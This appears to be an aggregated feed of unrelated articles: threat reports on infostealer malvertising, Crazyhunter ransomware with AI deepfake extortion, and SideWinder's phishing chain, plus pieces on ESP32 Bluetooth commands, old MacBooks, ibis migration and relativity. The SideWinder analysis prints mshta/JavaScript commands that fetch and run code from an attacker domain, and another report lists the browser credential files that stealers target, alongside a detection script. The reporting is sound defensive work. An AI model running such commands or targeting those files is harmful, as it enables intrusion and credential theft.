GitHub was used mainly to host the payload, but Discord and Dropbox were also used. The experts believe the campaign was opportunistic, in the sense that the attackers went after everyone without singling out specific people, organizations or sectors.

The malware that penetrated the victims’ systems (usually the Lumma and Doenerium infostealers) stole the following data from browsers, where login cookies, passwords, histories and other sensitive information may be stored:

  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\cookies.sqlite;
  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\formhistory.sqlite;
  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\key4.db;
  • \AppData\Roaming\Mozilla\Firefox\Profiles\.default-release\logins.json;
  • \AppData\Local\Google\Chrome\User Data\Default\Web Data;
  • \AppData\Local\Google\Chrome\User Data\Default\Login Data;
  • \AppData\Local\Microsoft\Edge\User Data\Default\Login Data.

The attackers were also interested in files stored in the Microsoft OneDrive cloud service, and the malware checked for the presence of cryptocurrency wallets (Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey and BitBox) on the victim’s computer.
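A defender-side check built on the file list above, as an added example for this page (not Microsoft’s detection logic): it runs constructed EDR-style file-access events through the credential-store paths named in the report and flags any process other than the owning browser that touches them. The user name, process names and profile directory in the sample events are made up, and the path patterns generalize the report’s Default/.default-release entries to any profile directory.

```python
"""Flag non-browser processes touching the browser credential stores listed
in the Microsoft report.

Added example for this page, not Microsoft's detection logic. Event records
are constructed in a generic EDR shape (process image, path, action); the
user name, process names and profile directory names are made up.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class FileEvent:
    process: str  # image name of the process that accessed the file
    path: str     # full Windows path that was accessed
    action: str   # "read", "copy", "write", ...


# Processes that legitimately read their own stores; anything else is flagged.
EXPECTED_READERS = {
    "firefox": {"firefox.exe"},
    "chrome": {"chrome.exe"},
    "edge": {"msedge.exe"},
}

# Regexes over the lower-cased path tail after "\AppData\". "[^\\]+" stands in
# for the profile directory (Firefox's random prefix before ".default-release",
# Chrome's and Edge's "Default" or "Profile N").
_FF = r"roaming\\mozilla\\firefox\\profiles\\[^\\]*\.default-release\\"
_CHROME = r"local\\google\\chrome\\user data\\[^\\]+\\"
_EDGE = r"local\\microsoft\\edge\\user data\\[^\\]+\\"

CREDENTIAL_STORES = [
    # (browser, pattern, description)
    ("firefox", _FF + r"cookies\.sqlite$", "Firefox cookies"),
    ("firefox", _FF + r"formhistory\.sqlite$", "Firefox form history"),
    ("firefox", _FF + r"key4\.db$", "Firefox key database"),
    ("firefox", _FF + r"logins\.json$", "Firefox saved logins"),
    ("chrome", _CHROME + r"web data$", "Chrome web/autofill data"),
    ("chrome", _CHROME + r"login data$", "Chrome saved logins"),
    ("edge", _EDGE + r"login data$", "Edge saved logins"),
]


def classify_store(path: str) -> tuple[str, str] | None:
    """Return (browser, description) if the path is a known credential store."""
    m = re.search(r"\\appdata\\(.+)$", path.lower())
    if not m:
        return None
    tail = m.group(1)
    for browser, pattern, description in CREDENTIAL_STORES:
        if re.search(pattern, tail):
            return browser, description
    return None


def find_suspicious_access(events: list[FileEvent]) -> list[dict]:
    """Events where a credential store is touched by a process other than its browser."""
    alerts = []
    for ev in events:
        hit = classify_store(ev.path)
        if hit is None:
            continue
        browser, description = hit
        if ev.process.lower() in EXPECTED_READERS[browser]:
            continue
        alerts.append({"process": ev.process, "action": ev.action,
                       "store": description, "path": ev.path})
    return alerts


def stores_per_process(alerts: list[dict]) -> dict[str, list[str]]:
    """Group alerts by process; one process hitting several stores is the stronger signal."""
    grouped = defaultdict(set)
    for a in alerts:
        grouped[a["process"]].add(a["store"])
    return {proc: sorted(stores) for proc, stores in grouped.items()}


# Constructed sample telemetry: two benign browser reads, one unrelated file,
# and three reads of credential stores by processes that have no business there.
SAMPLE_EVENTS = [
    FileEvent("chrome.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data", "read"),
    FileEvent("firefox.exe", r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\k3p9x1zq.default-release\logins.json", "read"),
    FileEvent("notepad.exe", r"C:\Users\alice\Documents\notes.txt", "read"),
    FileEvent("svc_update.exe", r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\k3p9x1zq.default-release\key4.db", "copy"),
    FileEvent("svc_update.exe", r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\k3p9x1zq.default-release\logins.json", "copy"),
    FileEvent("powershell.exe", r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default\Login Data", "read"),
]

if __name__ == "__main__":
    for proc, stores in stores_per_process(find_suspicious_access(SAMPLE_EVENTS)).items():
        print(f"{proc}: {', '.join(stores)}")
```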

According to Microsoft, the first-stage payloads were digitally signed, and the company has now identified and revoked 12 different certificates used in these attacks.

The article Microsoft reveals a shocking attack: 1 million PCs infected by malware hidden in ads comes from il blog della sicurezza informatica.


Conservationists Are Flying Microlites To Teach Birds How To Migrate


When it comes to what birds have and what humans don’t, your mind might first land on the ability to fly. However, birds are also pretty good at navigating from the air… assuming, that is, they know where they’re trying to go in the first place.

In recent decades, conservationists have been trying to reintroduce the northern bald ibis to central Europe. There’s just one problem—when the birds first died out on the continent, so did their handed-down knowledge of their traditional migration route. Somehow, the new generation had to be taught where to go.

Flightpaths

The northern bald ibis was once widely found all over Europe, but disappeared several centuries ago. It had the most success clinging on in Morocco, which has been a source of birds for reintroduction efforts. Credit: Len Worthington, CC BY-SA 2.0
The population of the northern bald ibis used to be spread farther and wider than it is today. Fossil records indicate the bird once lived in great numbers across northern Africa, the Middle East, and southern and central Europe. Sadly, it vanished from Europe sometime in the 17th century, though it persisted elsewhere, most notably in Morocco. A wild population hung on in Turkey, though faced a rapid decline from the 1970s onwards, with birds failing to return from their winter migrations. In 1992, a handful of remaining birds were kept caged for part of the year to prevent these annual losses. Meanwhile, in 2002, it was revealed that a handful of birds were clinging on with isolated nests found in Syria. Numbers remain limited in the low four-figure range, with the northern bald ibis definitively listed as endangered.


With the bird’s status in danger, multiple reintroduction efforts have been pursued around the world. In particular, European efforts had boosted a conserved population up to 300 individuals by the early 2000s. However, keeping the birds alive proved challenging. Being unfamiliar with the continent, the birds would tend to fly off in random directions when their instinct kicked in to migrate for winter. Without knowing where they were going, few birds would make it to a suitably warm climate for the colder months, and many failed to return home in the summer.
The birds are kept in aviaries at times to ensure they are fit for migration and that they don’t head off in a random direction of their own accord. Credit: Baekemm, CC BY-SA 4.0
In 2002, an effort to solve this began in earnest. It hoped to not only return the birds to the wild, but to let them freely roam and migrate as they once did with abandon. The hope was to breed birds in captivity, and then train them on their traditional migration route, such that they might then pass the knowledge on to their descendants.

Of course, you can’t simply sit a northern bald ibis down with a map and show it how to get from northern Austria down to Tuscany and back. Nor can you train it on a flight simulator or give it a GPS. Instead, the conservationists figured they’d teach the birds the old fashioned way. They’d fly the route with a microlite aircraft, with the birds trained to follow along behind. Once they got the idea, the microlite would guide them on the longer migration route, and the hope was that they’d learn to repeat the journey themselves for the future.

The benefit of using ultralight aircraft was simple. It allowed the birds to see their keepers and follow a familiar human in flight. In contrast, typical general aviation aircraft or larger planes wouldn’t be so familiar to the birds, and they wouldn’t be so eager to follow.

In 2003, the first migration attempt took place. The initial attempt faced challenges, with inclement weather forcing the birds to be transported much of the way by road. However, the following year found great success. The birds were guided south during the autumn, and returned the following spring. The project continued, with repeat successes over the years. Reports from 2010 were particularly buoyant. Across August and September that autumn, the journey saw 14 birds following the microlites for an average distance of 174 km a day, winding up in Tuscany in time for the winter.

youtube.com/embed/3kE83VIZZO0?…

The project continues in earnest to this day. “We have to teach them the migration route and that’s what we do using microlight planes,” project director Johannes Fritz told AP. Leading the Waldrappteam, he’s been working for decades to train the birds on what used to come naturally. “Human foster parents raise the chicks so they are imprinted on human foster parents, and then we train them to follow the foster parents which sit on the back seat of the microlight—and it works.” The training is taking hold, with the team recording multiple birds independently deciding to fly the correct migration route over the years.

The hope is that the flock will grow larger and eventually become self-sustaining. Ideally, the older birds that know the route will teach younger generations, just as they learned themselves from the microlite pilots in their youth. It’s a grand tradition, passed down from pilot to bird to bird, perhaps not quite as nature intended!

Featured image: “Migration 2023 Laura Pehnke” Copyright: Waldrappteam Conservation & Research


hackaday.com/2025/03/10/conser…


The ESP32 Bluetooth Backdoor That Wasn’t


Recently there was a panicked scramble after the announcement by [Tarlogic] of a ‘backdoor’ found in Espressif’s popular ESP32 MCUs. Specifically, a backdoor on the Bluetooth side that would supposedly give any attacker a lot of control over the system. As [Xeno Kovah] explains, much about these claims is exaggerated, and calling it a ‘backdoor’ goes far beyond what was actually discovered.

To summarize the original findings, the researchers found a number of vendor-specific commands (VSCs) in the (publicly available) ESP32 ROM that can be sent via the host-controller interface (HCI) between the software and the Bluetooth PHY. They found that these VSCs could do things like writing and reading the firmware in the PHY, as well as send low-level packets.

The thing about VSCs is of course that they are a standard feature of Bluetooth controllers, with each manufacturer implementing a range of them for use with its own software SDK. These VSCs allow for updating firmware, reporting temperatures and features like debugging, and are generally documented (except for Broadcom’s).

Effectively, [Xeno] makes the point that VSCs are a standard feature in Bluetooth controllers, which – like most features – can also be abused. [Tarlogic] has since updated their article as well to distance themselves from the ‘backdoor’ term and instead want to call these VSCs a ‘hidden feature’. That said, if these VSCs in ESP32 chips are a security risk, then as [Xeno] duly notes, millions of BT controllers from Texas Instruments, Broadcom and others with similar VSCs would similarly be a security risk.
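To make the VSC mechanism concrete, here is an added example written for this page (not Tarlogic’s, Xeno Kovah’s or Espressif’s code): it decodes an H4-framed stream of HCI command packets, splits each opcode into OGF and OCF, and flags commands in the vendor-specific OGF 0x3F. The 0xFC01 opcode in the sample trace is a constructed placeholder, not a documented ESP32 command.

```python
"""Decode HCI command packets and flag vendor-specific commands (VSCs).

Added example for the ESP32 VSC discussion; not Tarlogic's, Xeno Kovah's
or Espressif's code. It parses the H4 (UART) framing of HCI command
packets and classifies each opcode by its OGF. The vendor opcode in the
sample trace is a constructed placeholder, not a real ESP32 command.
"""
from __future__ import annotations

from dataclasses import dataclass

H4_COMMAND = 0x01            # H4 packet indicator for an HCI command packet
OGF_VENDOR_SPECIFIC = 0x3F   # OGF reserved by the Bluetooth Core spec for vendor commands

# A few standard opcodes (OGF << 10 | OCF) from the Bluetooth Core specification.
STANDARD_OPCODES = {
    0x0C03: "HCI_Reset",
    0x1001: "HCI_Read_Local_Version_Information",
    0x2006: "HCI_LE_Set_Advertising_Parameters",
}


@dataclass(frozen=True)
class HciCommand:
    opcode: int
    ogf: int      # opcode group field, upper 6 bits of the opcode
    ocf: int      # opcode command field, lower 10 bits of the opcode
    params: bytes

    @property
    def is_vendor_specific(self) -> bool:
        return self.ogf == OGF_VENDOR_SPECIFIC

    @property
    def name(self) -> str:
        if self.is_vendor_specific:
            return f"VSC(ocf=0x{self.ocf:03x})"
        return STANDARD_OPCODES.get(self.opcode, f"opcode=0x{self.opcode:04x}")


def parse_hci_commands(stream: bytes) -> list[HciCommand]:
    """Split an H4 byte stream into HCI command packets.

    Layout per command: 0x01 | opcode (2 bytes, little-endian) | param_len (1) | params.
    Raises ValueError on truncation or a non-command indicator so a corrupted
    capture is reported instead of being silently misparsed.
    """
    commands = []
    pos = 0
    while pos < len(stream):
        if stream[pos] != H4_COMMAND:
            raise ValueError(f"unexpected H4 indicator 0x{stream[pos]:02x} at offset {pos}")
        if pos + 4 > len(stream):
            raise ValueError("truncated HCI command header")
        opcode = int.from_bytes(stream[pos + 1:pos + 3], "little")
        plen = stream[pos + 3]
        params = stream[pos + 4:pos + 4 + plen]
        if len(params) != plen:
            raise ValueError("truncated HCI command parameters")
        commands.append(HciCommand(opcode, opcode >> 10, opcode & 0x3FF, params))
        pos += 4 + plen
    return commands


def vendor_commands(stream: bytes) -> list[HciCommand]:
    """Return only the vendor-specific commands present in the stream."""
    return [c for c in parse_hci_commands(stream) if c.is_vendor_specific]


# Constructed sample trace: two standard commands followed by one vendor-specific
# command. Opcode 0xFC01 is a placeholder VSC (OGF 0x3F, OCF 0x001), not a
# documented ESP32 command; its two parameter bytes are arbitrary.
SAMPLE_TRACE = bytes([
    0x01, 0x03, 0x0C, 0x00,              # HCI_Reset, no parameters
    0x01, 0x01, 0x10, 0x00,              # HCI_Read_Local_Version_Information
    0x01, 0x01, 0xFC, 0x02, 0xAA, 0xBB,  # constructed VSC with 2 parameter bytes
])

if __name__ == "__main__":
    for cmd in parse_hci_commands(SAMPLE_TRACE):
        note = "  <-- vendor-specific; check it against the vendor SDK docs" if cmd.is_vendor_specific else ""
        print(f"{cmd.name:40s} OGF=0x{cmd.ogf:02x} OCF=0x{cmd.ocf:03x} params={cmd.params.hex()}{note}")
```

Run over the H4 bytes of a real host-to-controller capture, the same classification shows which vendor commands a host stack actually issues during normal operation, which is the baseline any “hidden feature” claim should be measured against.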


hackaday.com/2025/03/10/the-es…


Inexpensive Repairable Laptops, With Apple Style


Despite a general lack of real-world experience, many teenagers are overly confident in their opinions, often to the point of brashness and arrogance. In the late 90s and early 00s I was no different, firmly entrenched in a clichéd belief that Apple computers weren’t worth the silicon they were etched onto—even though I’d never actually used one. Eventually, thanks to a very good friend in college, a bit of Linux knowledge, and Apple’s switch to Intel processors, I finally abandoned this one irrational belief. Now, I maintain an array of Apple laptops for my own personal use that are not only surprisingly repairable and hacker-friendly but also serve as excellent, inexpensive Linux machines.

Of course, I will have ruffled a few feathers suggesting Apple laptops are repairable and inexpensive. This is certainly not true of their phones or their newer computers, but there was a time before 2016 when Apple built some impressively high quality, robust laptops that use standard parts, have removable batteries, and, thanks to Apple dropping support for these older machines in their latest operating systems, can also be found for sale for next to nothing. In a way that’s similar to buying a luxury car that’s only a few years old and letting someone else eat the bulk of the depreciation, a high quality laptop from this era is only one Linux install away from being a usable and relatively powerful machine at an excellent bargain.

The History Lesson


To be fair to my teenage self though, Apple used to use less-mainstream PowerPC processors, which meant there was very little software cross-compatibility with x86 PCs. It was also an era before broadband meant that most people could move their work into the cloud and the browser, allowing them to be more agnostic about their operating system. Using an Apple when I was a teenager was therefore a much different experience than it is today. My first Apple was from this PowerPC era though; my ThinkPad T43 broke mid-way through college and a friend of mine gave me an old PowerBook G4 that had stopped working for her. Rather than have no computer at all, I swallowed my pride and was able to get the laptop working well enough to finish college with it. Part of the reason this repair was even possible was thanks to a major hacker-friendly aspect of Apple computers: they run Unix. (Note for commenters: technically Apple’s OS is Unix-like, but they have carried a UNIX certification since 2007.)

I had used Unix somewhat in Solaris-based labs in college but, as I mentioned in a piece about installing Gentoo on one of my MacBooks, I was also getting pretty deep into the Linux world at the time as well. Linux was also designed to be Unix-like, so most of the basic commands and tools available for it have nearly one-to-one analogs in Unix. The PowerBook’s main problem, along with a battery that needed a warranty replacement, was a corrupted filesystem and disk drive that I was able to repair using my new Linux knowledge. This realization marked a major turning point for me which helped tear down most of my biases against Apple computers.
MacBooks through the ages
Over the next few years I grew quite fond of the PowerBook, partially because I liked its 12″, netbook-like form factor and also because the operating system never seemed to crash. As a Linux user, my system crashes were mostly self-inflicted, but they did happen. As a former Windows user as well, the fact that it wouldn’t randomly bluescreen itself through no fault of my own was quite a revelation. Apple was a few years into its Intel era at this point as well, and seeing how easily these computers did things my PowerBook could never do, including running Windows, I saved up enough money to buy my first MacBook Pro, a mid-2009 model which I still use to this day. Since then I’ve acquired four other Apple laptops, most of which run Linux or a patched version of macOS that lets older, unsupported machines run modern versions of Apple’s operating system.

So if you’ve slogged through my coming-of-age story and are still curious about picking up an old Mac for whatever reason—a friend or family member has one gathering dust, you’re tired of looking at the bland styling of older ThinkPads while simultaneously growing frustrated with the declining quality of their newer ones, or just want to go against the grain a bit and do something different—I’ll try and help by sharing some tips and guidelines I’ve picked up through the years.

What to Avoid


Starting with broad categories of older Apple laptops to avoid, the first major red flag is any with the butterfly keyboard that Apple put on various laptops from 2015 to 2019, which were so bad that a number of lawsuits were filed over them. Apple eventually relented and instituted a replacement program for them, but it has since expired and the keyboard can otherwise cost hundreds of dollars to fix. The second red flag is models with the T2 security chip. It’s not a complete dealbreaker but it does add a lot of hassle if the end goal is a working Linux machine.

Additionally, pay close attention to any laptops with discrete graphics cards. Some older MacBooks have Nvidia graphics, which is almost always going to provide a below-average experience for a Linux user especially for Apple laptops of this vintage. Others have AMD graphics which do have better Linux support, but there were severe problems with the 15″ and 17″ Mac around the 2011 models. Discrete graphics is not something to avoid completely like laptops with butterfly keyboards, but it’s worth investigating the specific model year for problems if a graphics card is included. A final note is to be aware of “Staingate” which is a problem which impacted some Retina displays between 2012 and 2015. This of course is not an exhaustive list, but covers the major difficult-to-solve problems for this era of Apple laptop.

What to Look For


As for what specific computers are the best from this era for a bit of refurbishment and use, in my opinion the best mix of performance, hackability, and Linux-ability will be from the 2009-2012 Unibody era. These machines come in all sizes and are surprisingly upgradable, with standard SODIMM slots for RAM, 2.5″ laptop drives, an optical drive (which can be changed out for a second hard drive), easily replaceable batteries if you can unscrew the back cover, and plenty of ports. Some older models from this era have Core 2 Duo processors and should be avoided if you have the choice, but there are plenty of others from this era with much more powerful Core i5 or Core i7 processors.

After 2012, though, Apple started making some less-desirable changes for those looking to maintain their computers long-term, like switching to a proprietary M.2-like port for their storage and adding in soldered or otherwise non-upgradable RAM, but these machines can still be worthwhile as many had Core i7 processors and at least 8 GB of RAM and can still run Linux and even modern macOS versions quite capably. The batteries can still be replaced without too much hassle as well.
Inside the 2012 MacBook Pro. Visible here are the 2.5″ SSD, removable battery, standard SODIMM RAM slots, optical drive, and cooling fan.
Of course, a major problem with these computers is that they all have processors that have the Intel Management Engine coprocessor installed, so they’re not the most privacy-oriented machines in existence even if Linux is the chosen operating system. It’s worth noting, though, that some MacBooks from before the unibody era can run the open-source bootloader Libreboot but the tradeoff, as with any system capable of running Libreboot, is that they’re a bit limited in performance even compared to the computers from just a few years later.

Out of the five laptops I own, four are from the pre-butterfly era including my two favorites. Topping the list is a mid-2012 13″ MacBook Pro with Intel graphics that’s a beast of a Debian machine thanks to upgrades to a solid state drive and to 16 GB of RAM. It also has one of the best-feeling laptop keyboards I’ve ever used to write with, and is also the computer I used to experiment with Gentoo.

Second place goes to a 2015 11″ MacBook Air, a netbook-style Apple that I like for its exceptional portability even though it’s not as upgradable as I might otherwise like. It will have 4 GB of RAM forever, but this is not much of a problem for Debian. I also still have my 2009 MacBook Pro, which runs macOS Sonoma thanks to OpenCore Legacy Patcher. This computer’s major weakness is that it has an Nvidia graphics card, so it isn’t as good a Linux machine as the others, and occasionally locks up when running Debian for this reason. But it has also been upgraded with an SSD and 8 GB of RAM, so Sonoma still runs pretty well on it despite its age. Sequoia, on the other hand, dropped support for dual-core machines, so I’m not sure what I will do with it after Sonoma is no longer supported.
A 13″ MacBook Air from 2013. Not quite as upgradable as the 2012 MacBook Pro but still has a removable battery and a heat sink which can be re-pasted much more easily.
My newest Apple laptop is an M1 MacBook Air, which I was excited about when it launched because I’m a huge fan of ARM-based personal computers for more reasons than one. Although the M1 does have essentially no user-repairability unless you want to go to extremes, I have some hope that this will last me as long as my MacBook Pros have thanks to a complete lack of moving parts and also because of Asahi Linux, a version of Fedora which is built for Apple silicon. Whenever Apple stops providing security patches for this machine, I plan to switch it over to this specialized Linux distribution.

Why Bother?


But why spend all this effort keeping these old machines running at all? If repairability is a major concern, laptops from companies like System76 or Framework are arguably a much better option. Not to mention that, at least according to the best Internet commenters out there, Apple computers aren’t supposed to be fixable, repairable, or upgradable at all. They’re supposed to slowly die as upgrades force them to be less useful.

While this is certainly true for their phones and their more modern machines to some extent, part of the reason I keep these older machines running is to go against the grain and do something different, like a classic car enthusiast who picks a 70s era Volkswagen to drive to and from the office every day instead of a modern Lexus. It’s also because at times I still feel a bit like that teenager I was. While I might be a little wiser now from some life experiences, I believe some amount of teenage rebellion can be put to use stubbornly refusing to buy the latest products year after year from a trillion-dollar company which has become synonymous with planned obsolescence. Take that, Apple!


hackaday.com/2025/03/10/inexpe…


Crazyhunter: the new ransomware with the “Three-dimensional Data Annihilation System”


During reconnaissance of the underground and of criminal groups carried out by Red Hot Cyber’s DarkLab threat intelligence laboratory, we came across the Data Leak Site of a cyber gang never monitored before: Crazyhunter.

With a distinct identity and a manifesto that sets it apart from other actors on the cybercrime scene, Crazyhunter presents itself as a sophisticated operation focused on attack speed, data destruction and a highly structured system of criminal branding.

From the information gathered on their Data Leak Site (DLS), available on the Tor network, the group appears to take a methodical and aggressive approach aimed at compromising corporate security in the shortest possible time.

With a negotiation and ransom-management system that includes tools to “demonstrate” their destructive capabilities, Crazyhunter stands out for a business model that emphasizes advanced cryptography and even the use of a blockchain to record their decryption “promises”.

Structure of the Crazyhunter DLS


Crazyhunter’s Tor portal is divided into several sections, with a minimal but functional design.

The homepage presents the group’s name and motto: “There is no absolute safety”. A statement that reflects their philosophy, according to which no system is immune to a well-structured attack.

Victim List

The list of published victims shows companies and institutions, mainly in Taiwan, including hospitals and universities. Each entry shows:

  • The ransom amount demanded (up to $1,500,000).
  • The negotiation status, with some entries marked Expired (probably meaning the data will be released) and others labelled Successful cooperation (indicating a payment was made).
  • A countdown timer for the deadline of the deal, suggesting a mechanism of psychological pressure on victims.

About Us Here the group describes its modus operandi and the strengths of the ransomware.

Contact Us A page with a contact form, used for negotiations or possible collaborations.


Attack Techniques and Tactics


From the information provided in its strategic manifesto, Crazyhunter presents itself as a highly technical operation with a set of distinctive characteristics that make it particularly dangerous:

Ultra-fast approach: the “72-hour Vulnerability Response Vacuum”


Crazyhunter claims to breach victims’ security in under 72 hours, thanks to:

  • Exclusive exploits, with a time to detection 300% longer than the averages estimated by MITRE.
  • Advanced bypass of the best-known endpoint protection systems, including CrowdStrike, SentinelOne, Microsoft Defender XDR, Symantec EDR and Trend Micro XDR.

This indicates that the group exploits well-targeted zero-day or N-day vulnerabilities, along with advanced evasion tactics that may include the use of polymorphic malware and fileless attack techniques.

The “Three-dimensional Data Annihilation System”


Crazyhunter does not limit itself to encrypting data, but introduces a concept of “annihilation” on three levels:

  • Encryption Layer → Uses the XChaCha20-Poly1305 algorithm, known for its security and speed, making data recovery impossible without the correct key.
  • Destruction Layer → Employs a CIA-approved wiping technology, probably referring to standards such as DoD 5220.22-M or multi-pass overwriting methods to make the data unrecoverable.
  • Deterrence Layer → Here a new element in the ransomware landscape emerges: the group claims to generate highly realistic compromising evidence against the executives of attacked companies, using AI and deepfakes, to exert additional pressure in negotiations.

This mix of advanced cryptography, total data destruction and reputational threats makes Crazyhunter a unique actor of its kind, combining traditional ransomware with methods of psychological coercion.

Criminal Branding and Blockchain


Crazyhunter also stands out for a concept new to the ransomware world: criminal branding. The services offered include:

  • The option to delay publication of the data by paying 50% of the ransom up front.
  • A remediation guide for the vulnerabilities used in the attack, apparently as an incentive to pay.
  • A proof video of the data deletion once the ransom is paid.

Finally, the strategic manifesto stresses that the group does not consider itself “greedy” like REvil or “too noisy” like LockBit, and declares that it does only three things:

  1. Demonstrate the inevitability of the attack through mathematics.
  2. Ensure the irreversibility of the threat through code.
  3. Record every kept promise on the blockchain.

The last point suggests that Crazyhunter may use a public or private blockchain to keep track of completed operations, perhaps to show future victims that it keeps its word when it comes to providing decryptors after payment.

Targets and Victims


Analysis of the victim list on Crazyhunter’s DLS shows that the group has concentrated mainly on Taiwanese organizations, with a focus on:

  • Universities and research institutes (Asia University, Asia University Hospital).
  • Healthcare facilities (Mackay Hospital, Changhua Christian Medical Foundation).
  • Companies in the energy sector (Huacheng Electric).

The inclusion of hospitals and academic institutions suggests opportunistic targeting, where the likelihood of payment is high because of the sensitivity of the data involved. However, the group may expand its reach to companies in other sectors in the coming months.

Conclusions


Crazyhunter is not the usual ransomware group. Unlike other operations that focus only on file encryption, this group introduces additional pressure tactics, including:

  • Irreversible destruction of the data, in addition to encryption.
  • Use of AI to create compromising evidence against executives.
  • Recording of operations on the blockchain to build “trust” in the criminal market.

Although it is still early to assess its overall impact, Crazyhunter has already shown that it can hit high-profile organizations and that it has a highly strategic operating model. The combination of advanced exploits, sophisticated cryptography and coercion tactics makes it an emerging threat not to be underestimated.

For companies, the lesson is clear: protecting against traditional ransomware is not enough. New generations of cybercriminals are honing increasingly destructive strategies that are harder to counter.

The article Crazyhunter: the new ransomware with the “Three-dimensional Data Annihilation System” comes from il blog della sicurezza informatica.


You Are Already Traveling at the Speed of Light


Science fiction authors and readers dream of travelling at the speed of light, but Einstein tells us we can’t. You might think that’s an arbitrary rule, but [FloatHeadPhysics] shows a different way to think about it. Based on a book he’s been reading, “Relativity Visualized,” he provides a graphic argument for relativity that you can see in the video below.

The argument starts off by explaining how a three-dimensional object might appear in a two-dimensional world. In this world, everything is climbing in the hidden height dimension at the exact same speed.

Our 2D friends, of course, can only see the shadow of the 3D object so if it is staying in one place on the table surface, the object never seems to move. However, just as we can measure time with a clock, the flat beings could devise a way to measure height. They would see that the object was moving “through height” at the fixed speed.

Now suppose the object turns a bit and is moving at, say, a 45 degree angle relative to the table top. Now the shadow moves, and the “clock” measuring the height starts advancing more slowly. If the object moves totally parallel to the surface, the shadow moves at the full fixed speed and the height clock doesn’t advance at all.

This neatly explains time dilation and length contraction. It also shows that the speed of light isn’t necessarily a rule. It is simply that everything in the observable universe is already moving at the speed of light, and moving through space changes how much of that motion shows up as the passage of time.
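The geometric argument above, written out as an added equation (not from the video or the book): in the book’s picture every object’s speed through spacetime is fixed at c, and its space and time components add like the legs of a right triangle,

\[
v_{\text{space}}^2 + v_{\text{time}}^2 = c^2, \qquad v_{\text{space}} = v, \quad v_{\text{time}} = c\,\frac{d\tau}{dt},
\]

so a clock moving at speed v advances its own time τ at the rate

\[
\frac{d\tau}{dt} = \sqrt{1 - \frac{v^2}{c^2}}.
\]

At the 45 degree tilt of the text, v = c/√2 and the clock runs at 1/√2 ≈ 0.71 of the rate of a stationary one; at v = c it does not advance at all, and at v = 0 all of the motion is “through height”.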

Doesn’t make sense? Watch the video and it will. Pretty heady stuff. We love how passionate [FloatHeadPhysics] gets about the topic. If you prefer a funnier approach, turn to the BBC. Or, if you like the hands-on approach, build a cloud chamber and measure some muons.

youtube.com/embed/TJmgKdc7H34?…


hackaday.com/2025/03/10/you-ar…


SideWinder targets the maritime and nuclear sectors with an updated toolset


Last year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been military and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had mostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively extending its activities beyond their typical targets, infecting government entities, logistics companies and maritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further information about SideWinder’s post-exploitation activities and described a new sophisticated implant designed specifically for espionage.

We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but we noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.

In 2024, we initially observed a significant number of attacks in Djibouti. Subsequently, the attackers shifted their focus to other entities in Asia and showed a strong interest in targets within Egypt.

Moreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy in South Asia and further expansion of activities into new countries, especially in Africa.

Countries and territories targeted by SideWinder in the maritime and logistics sectors in 2024

It is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software detections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our observation of the group’s activities, we presume they are constantly monitoring detections of their toolset by security solutions. Once their tools are identified, they respond by generating a new and modified version of the malware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used to maintain persistence and load components. Additionally, they change the names and paths of their malicious files. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.

Infection vectors


The infection pattern observed in the second part of 2024 is consistent with the one described in the previous article.

Infection flow

The attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker. The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

The documents used various themes to deceive victims into believing they are legitimate.

Some documents concerned nuclear power plants and nuclear energy agencies.

Malicious documents related to nuclear power plants and energy

Many others concerned maritime infrastructures and various port authorities.

Malicious documents relating to maritime infrastructures and different port authorities

In general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most of the attacks were aimed at various national ministries and diplomatic entities.

We also detected various documents that covered generic topics. For example, we found a document with information on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document offering a freelance video game developer a job working on a 3D action-adventure game called “Galactic Odyssey”.

Examples of generic malicious documents

RTF exploit


The exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the main goal remained the same: to run embedded JavaScript code invoking the mshtml.RunHTMLApplication function. In the new version, the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from a remote server:

javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe dgtk.depo-govpk[.]com/19263687…);window.close();")
The newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although they differ slightly from those in past versions.

  • It uses the GlobalMemoryStatusEx function to determine the size of RAM.
  • It attempts to load the nlssorting.dll library and terminates execution if the operation succeeds.


JavaScript loader


The RTF exploit led to the execution of the mshta.exe Windows utility, abused to download a malicious HTA from a remote server controlled by the attacker:

mshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui

The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader Module”, into memory.

The JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially encoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if the total size is less than 950 MB. Otherwise, the previously decoded strings are used to load the second stage.

